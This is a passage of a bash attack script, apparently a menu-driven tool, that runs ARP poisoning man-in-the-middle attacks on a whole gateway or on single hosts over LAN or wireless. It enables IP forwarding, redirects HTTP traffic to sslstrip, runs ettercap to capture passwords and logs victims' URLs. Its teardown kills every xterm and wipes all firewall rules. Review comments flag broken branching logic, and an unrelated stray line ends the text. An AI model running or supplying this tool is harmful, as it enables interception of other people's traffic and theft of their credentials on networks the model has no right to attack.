echo $RED"              *    1.  Attack entire Gateway through LAN       *";
echo $RED"              *    2.  Attack entire Gateway through Wireless  *";
echo $RED"              *    3.  Attack single host through LAN          *";
echo $RED"              *    4.  Attack single host through Wireless     *";
echo $RED"              *    5.  Return to Main Menu                     *";
echo $RED"              **************************************************";
echo $STAND""
echo ""
echo $BLUE"                           Select Menu Option: "
read menuoption
if [ $menuoption = "1" ]; then
echo
echo
echo "                This should be your Gateway from what I see: "
echo ""
echo ""
route -n -A inet | grep UG
echo ""
echo ""
echo $STAND"Please type the IP of your Gateway in below: "$STAND
read GATEWAY
echo $BLUE"                         Starting attack on Gateway"
echo ""
echo ""
echo "                   Passwords will show up in ettercap window"
sleep 3
echo "1" > /proc/sys/net/ipv4/ip_forward

#  PORT redirection
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sleep 2

# URLSnarf
sudo xterm -bg blue -fg white -geometry 80x7-0+25 -l -lf /root/$SESSION/urlsnarf-$(date +%F-%H%M).txt -e urlsnarf  -i $ETH0 &
sleep 2

# Ettercap
xterm -bg blue -fg white -geometry 80x7-0+366 -s -sb -si +sk -sl 5000 -l -lf /root/$SESSION/ettercap$(date +%F-%H-%M).txt -e ettercap -Tq -i $ETH0 -M arp:remote /$GATEWAY/ // &
sleep 2

# SSLstrip
sudo xterm -bg blue -fg white -geometry 80x7-0+193 -e sslstrip -f -p -k 10000 &
sleep 2

# SSLstrip.log cat the file sslstrip.log
xterm -bg blue -fg white -geometry 80x7-0+539 -T SSLStrip-Log -l -lf /root/$SESSION/sslstrip$(date +%F-%H-%M).txt -e tail -f sslstrip.log &
sleep 2

clear
echo $RED"    ####################################################################"
echo $RED"    [          em3rgency's ARP poisoning script is now running         ]"
echo $RED"    [                                                                  ]"
echo $RED"    [                Press ENTER return to the Main Menu               ]"
echo $RED"    [                                                                  ]"
echo $RED"    [             IF not closed properly ERRORS WILL OCCUR             ]"
echo $RED"    ####################################################################"$STAND
read ENTERKEY

# Teardown for this option. The helper windows above were started without
# recording their PIDs, so they are stopped by process name.
# NOTE(review): killing by the name "xterm" ends every xterm this user owns,
# including windows that have nothing to do with the script.
for helper_name in sslstrip ettercap urlsnarf xterm; do
  killall "$helper_name"
done
# Forwarding is forced off rather than restored to its earlier value.
printf '%s\n' "0" > /proc/sys/net/ipv4/ip_forward
# NOTE(review): flushes all rules and deletes all user chains in the filter
# and nat tables, not only the redirect rule added by this option; any ruleset
# the host had before is lost.
iptables -F
iptables -t nat -F
iptables -X
iptables -t nat -X

./911_AP.sh
else
if [ $menuoption = "2" ]; then
#This will allow you to forward packets from the router
echo $BLUE"              This should be your gateway from what I see: "$STAND
echo ""
echo ""
route -n -A inet | grep UG
echo ""
echo ""
echo $BLUE"Please type the IP of your gateway: "$STAND
read GATEWAY
echo $BLUE"                      Starting attack on gateway"
echo ""
echo ""
echo ""
echo "                Passwords will show up in ettercap window"
sleep 3

echo "1" > /proc/sys/net/ipv4/ip_forward

# URLSnarf
sudo xterm -bg blue -fg white -geometry 80x7-0+25 -l -lf /root/$SESSION/urlsnarf-$(date +%F-%H%M).txt -e urlsnarf -i $WIFACE &
sleep 2

# Port redirection
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sleep 2

# Etterap
sudo xterm -bg blue -fg white -geometry 80x7-0+193 -l -lf /root/$SESSION/ettercap$(date +%F-%H-%M).txt -e ettercap -Tq -i $WIFACE -M arp:remote /$GATEWAY/ // &
sleep 2

# SSLstrip
sudo xterm -bg blue -fg white -geometry 80x7-0+366 -e sslstrip -f -p -k 10000 &
sleep 2

# SSLstrip.log cat the file sslstrip.log
xterm -bg blue -fg white -geometry 80x7-0+539 -T SSLStrip-Log -l -lf /root/$SESSION/sslstrip$(date +%F-%H-%M).txt -e tail -f sslstrip.log &
sleep 2

clear
echo $RED"    ####################################################################"
echo $RED"    [          em3rgency's ARP poisoning script is now running         ]"
echo $RED"    [                                                                  ]"
echo $RED"    [                Press ENTER return to the Main Menu               ]"
echo $RED"    [                                                                  ]"
echo $RED"    [             IF not closed properly ERRORS WILL OCCUR             ]"
echo $RED"    ####################################################################"$STAND
read ENTERKEY

killall sslstrip
killall ettercap
killall urlsnarf
killall xterm
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

./911_AP.sh
else
if [ $menuoption = "3" ]; then
#This will allow you to forward packets from the router
echo ""
echo ""
echo $BLUE"              This should be your gateway from what I see: "
echo ""
echo ""
route -n -A inet | grep UG
echo ""
echo ""
echo $STAND"Please type the IP of your gateway: "
read GATEWAY3
echo ""
echo ""
echo "Please type the IP of the target host: "
read HOST3
echo ""
echo $BLUE"                      Starting Attack on Target Host"
echo ""
echo ""
echo "                Passwords will show up in ettercap window"
sleep 3

echo "1" > /proc/sys/net/ipv4/ip_forward

# URLsnarf
sudo xterm -bg blue -fg white -geometry 80x7-0+25 -l -lf /root/$SESSION/urlsnarf-$(date +%F-%H%M).txt -e urlsnarf -i $ETH0 &
sleep 2

# Port redirection
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sleep 2

# Ettercap
sudo xterm -bg blue -fg white -geometry 80x7-0+193 -l -lf /root/$SESSION/ettercap$(date +%F-%H-%M).txt -e ettercap -TqM ARP:REMOTE /$GATEWAY3/ /$HOST3/ &
sleep 2

# SSLstrip
sudo xterm -bg blue -fg white -geometry 80x7-0+366 -e sslstrip -f -p -k 10000 &
sleep 2

# SSLstrip.log cat the file sslstrip.log
xterm -bg blue -fg white -geometry 80x7-0+539 -T SSLStrip-Log -l -lf /root/$SESSION/sslstrip$(date +%F-%H-%M).txt -e tail -f sslstrip.log &
sleep 2

clear
echo $RED"    ####################################################################"
echo $RED"    [          em3rgency's ARP poisoning script is now running         ]"
echo $RED"    [                                                                  ]"
echo $RED"    [                Press ENTER return to the Main Menu               ]"
echo $RED"    [                                                                  ]"
echo $RED"    [             IF not closed properly ERRORS WILL OCCUR             ]"
echo $RED"    ####################################################################"
read ENTERKEY

killall sslstrip
killall ettercap
killall urlsnarf
killall xterm
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

./911_AP.sh
else
if [ $menuoption = "4" ]; then
echo ""
echo ""
echo $BLUE"This should be your Gateway from what I see: "
echo ""
route -n -A inet | grep UG
echo ""
echo ""
echo $STAND"Please type the IP of your gateway: "
read GATEWAY4
echo ""
echo "Please type the IP of the target host: "
read HOST4
echo ""
echo $BLUE"                     Starting Attack on Target Host"
echo ""
echo ""
echo "                Passwords will show up in ettercap window"
sleep 3

echo "1" > /proc/sys/net/ipv4/ip_forward

# URLsnarf
sudo xterm -bg blue -fg white -geometry 80x7-0+25 -l -lf /root/$SESSION/urlsnarf-$(date +%F-%H%M).txt -e urlsnarf -i $WIFACE &
sleep 2

# Port redirection
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sleep 2

# Ettercap
sudo xterm -bg blue -fg white -geometry 80x7-0+193 -l -lf /root/$SESSION/ettercap$(date +%F-%H-%M).txt -e ettercap -Tq -i $WIFACE -M arp:remote /$GATEWAY4/ /$HOST4/ &
sleep 2

# SSLstrip
sudo xterm -bg blue -fg white -geometry 80x7-0+366 -e sslstrip -f -p -k 10000 &
sleep 2

# SSLstrip.log cat the file sslstrip.log
xterm -bg blue -fg white -geometry 80x7-0+539 -T SSLStrip-Log  -l -lf /root/$SESSION/sslstrip$(date +%F-%H-%M).txt -e tail -f sslstrip.log &
sleep 2

clear
echo $RED"    ####################################################################"
echo $RED"    [          em3rgency's ARP poisoning script is now running         ]"
echo $RED"    [                                                                  ]"
echo $RED"    [                Press ENTER return to the Main Menu               ]"
echo $RED"    [                                                                  ]"
echo $RED"    [             IF not closed properly ERRORS WILL OCCUR             ]"
echo $RED"    ####################################################################"
read ENTERKEY

killall sslstrip
killall ettercap
killall urlsnarf
killall xterm
echo "0" > /proc/sys/net/ipv4/ip_forward
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain

# Relaunch the menu. ./911_AP.sh runs as a child process, so every return to
# the menu nests one process deeper and this script resumes on the next line
# once that child exits.
./911_AP.sh
clear

# NOTE(review): there is no "else" before this message, so it still belongs to
# the option-4 branch. It is printed after every option-4 run (when the
# relaunched script returns) and the script is then started a second time,
# while a choice outside 1-4 never reaches it. The option-5 check after the
# closing "fi" lines is outside this chain as well.
echo $RED"                Invalid option, you must choose 1,2,3,4 or 5.."
sleep 2
echo $BLUE"                          Re-Launching Script..."
./911_AP.sh

fi
fi
fi
fi
if [ $menuoption = "5" ]; then
./911_AP.sh
fi
else

# A script to quickly tell whose on your network in real time.
if [ $menuoption = "5" ]; then
clear
echo $BLUE"           This will show all The clients connected to The network"
echo ""
sleep 3
clear
echo
echo
echo $STAND"Please type the name of your network interface Example: eth0 "
read IFACE;
echo ""
echo ""
echo "               This should be your gateway from what I see: "
route -n -A inet | grep UG
sleep 1
echo ""
echo ""
echo $STAND"Please type in the IP address of your gateway"
read GATEWAY;
sleep 2
clear
echo ""
echo ""
echo ""
echo $BLUE"                   Press CTRL C to stop close netdiscover"
echo ""
echo ""
echo $RED"    ####################################################################"
echo $RED"    [           em3rgency's Netdiscover script is now running          ]"
echo $RED"    [                                                                  ]"
echo $RED"    [                Press ENTER return to the Main Menu               ]"
echo $RED"    [                                                                  ]"
echo $RED"    [             IF not closed properly ERRORS WILL OCCUR             ]"
echo $RED"    ####################################################################"

sudo xterm -bg blue -fg white -e netdiscover -i $IFACE -r $GATEWAY/24
read ENTERKEY
clear
./911_AP.sh

else
if [ $menuoption = "6" ]; then
exit
fi
fi
fi
fi
fi
fi
Absolutely LOVE your answer lol